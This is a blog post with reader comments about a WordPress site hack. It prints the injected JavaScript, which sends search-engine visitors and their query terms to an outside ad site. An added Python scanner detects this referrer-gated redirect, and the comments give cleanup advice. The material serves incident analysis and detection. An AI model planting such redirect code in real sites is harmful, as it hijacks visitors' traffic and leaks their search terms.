My Site was Hacked

June 19th, 2008

Apologies to any visitors that were redirected away from my site to some random search site. I’m not quite sure how, but somehow the following was injected into my WordPress ‘header.php’ file:

<script>
	var r=document.referrer,t=\"\",q;
	if(r.indexOf(\"google.\")!=-1)t=\"q\";
	if(r.indexOf(\"msn.\")!=-1)t=\"q\";
	if(r.indexOf(\"yahoo.\")!=-1)t=\"p\";
	if(r.indexOf(\"altavista.\")!=-1)t=\"q\";
	if(r.indexOf(\"aol.\")!=-1)t=\"query\";
	if(r.indexOf(\"ask.\")!=-1)t=\"q\";
	if(t.length&&((q=r.indexOf(\"?\"+t+\"=\"))!=-1||(q=r.indexOf(\"&\"+t+\"=\"))!=-1))
		window.location=\"http://maxifind.net/index.php?pf_id=361&q=\"
                                     +r.substring(q+2+t.length).split(\"&\")[0];
</script>

The way the above code works is that if a user is referred to the site via a search engine, the user is immediately redirected to “maxifind.net”, which then displays ads related to the keywords from the search engine referer string. For any ad networks out there: this code was most definitely NOT inserted by me!!! Looking at traffic logs, it appears that “exit rates” spiked dramatically late last week, so thankfully it’s only been up for a couple of days.

Any suggestions as to how this happened would be appreciated. In the meantime I’ve changed all passwords and am in the process of upgrading my WordPress (which I haven’t done in a year… oops). It definitely goes to show: unless you’re going to put significant effort into maintaining your own software, it’s much better to leave the hosting to someone else!
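Added example (not part of the original post and not the author's code): a small Python scanner that flags `<script>` blocks in theme files which both read `document.referrer` and assign a new location, which is the pattern of the injected snippet above and the reason a direct visit by the site owner shows nothing. The function names, the sample header and the domain `redirect.example` are constructed for illustration.

```python
import re
import sys
from pathlib import Path

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
REFERRER_RE = re.compile(r"document\s*\.\s*referrer", re.I)
# Assignment to location / location.href (not "=="), or location.replace()/assign().
REDIRECT_RE = re.compile(
    r"\blocation(?:\s*\.\s*href)?\s*=(?!=)|\blocation\s*\.\s*(?:replace|assign)\s*\(", re.I)
# Host part of any absolute URL; tolerates the backslash-escaped quotes seen above.
URL_HOST_RE = re.compile(r"https?://([^/\s\"'\\?]+)", re.I)

# Constructed sample (placeholder domain): one gated redirect, one harmless referrer read.
SAMPLE_HEADER = '''<?php wp_head(); ?>
<script>
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(t.length&&(q=r.indexOf("?"+t+"="))!=-1)
  window.location="http://redirect.example/index.php?q="+r.substring(q+2+t.length);
</script>
<script>var cameFrom = document.referrer; if (location.hash == "#top") scrollTo(0, 0);</script>
'''

def scan_text(text, own_hosts=()):
    """Return one finding per <script> block that reads the referrer AND redirects."""
    findings = []
    for m in SCRIPT_RE.finditer(text):
        body = m.group(1)
        if REFERRER_RE.search(body) and REDIRECT_RE.search(body):
            hosts = {h.lower() for h in URL_HOST_RE.findall(body)} - set(own_hosts)
            findings.append({"line": text.count("\n", 0, m.start()) + 1,
                             "hosts": sorted(hosts)})
    return findings

def scan_tree(root, own_hosts=()):
    """Scan every .php file under root (e.g. a downloaded backup of wp-content)."""
    results = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_text(path.read_text(errors="replace"), own_hosts)
        if hits:
            results[str(path)] = hits
    return results

if __name__ == "__main__":
    report = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {"<sample>": scan_text(SAMPLE_HEADER)}
    for name, hits in report.items():
        for hit in hits:
            print(f"{name}:{hit['line']}: referrer-gated redirect, hosts={hit['hosts']}")
```

Run it against a downloaded copy of the site rather than the live server, and treat a clean result as one data point only, since a backdoor can live outside `.php` files (for example in `.htaccess`).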


  • http://www.yardley.ca/ Greg

    Mike –

    Because WordPress is open source and widely-used it’s routinely examined for security vulnerabilities. Got to keep it up to date to minimize your chance of this stuff happening.

    I’d actually reinstall from scratch, check the .htaccess file, etc. instead of just upgrading to minimize the odds of a backdoor being present (and not overwritten by the upgrade).

    Tons of articles on this out there but this one is representative:

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/comment-page-1/

    – Greg

  • http://justinsomnia.org/ Justin Watt

    Mike, similar thing happened to me. I don’t think it was so much a vulnerability in WP as my password being exposed by Dreamhost. So word to the wise, I’d recommend changing your webhosting and WP passwords. I wrote up my experience here: Search Engine Marketeers are the new script kiddies

  • Mike

    Thanks Greg — seems all is clear. In case this happens to anybody else, it seems McAfee identifies the hacked PHP files. (Found this out when it scanned through the backup I downloaded to my laptop and I got all sorts of Virus warnings!)

    -Mike

  • Debbie D

    It could be, and possibly was, both. WP has had numerous vulnerabilities, and several major host farms were attacked and servers infected.

    Mike, are you US-based? I have someone doing a major article on this who needs to speak to a US-based site that was recently attacked. I hope you can grab my email address from your control panel.

  • http://bizarrenews.co.uk janey

    I installed WordPress 2.6.5 on my server yesterday and 15 minutes ago there were lots of categories added that I had not put there. I spent 2 days working on it, then had to delete it. In the categories was crazyhorse. Thanks for nothing, crazyhorse.